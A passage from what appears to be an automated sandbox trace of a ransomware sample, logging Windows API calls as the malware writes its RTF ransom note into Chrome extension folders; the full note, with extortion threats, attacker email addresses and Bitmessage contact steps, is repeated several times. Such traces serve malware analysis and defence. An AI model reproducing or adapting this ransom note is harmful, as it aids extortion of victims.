b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\n¯óÈgÑãHÐ\x09K¨?ìc¥àÛ©ü\x0c¥ñs\x01", lpUsedDefaultChar=0x0) returned 8717 [0284.516] WriteFile (in: hFile=0x228, lpBuffer=0x248aaf8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248aaf8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0284.531] CloseHandle (hObject=0x228) returned 1 [0284.531] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\#readme_eman#.rtf")) returned 0xffffffff [0284.531] GetLastError () returned 0x2 [0284.531] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0284.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248aaf8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 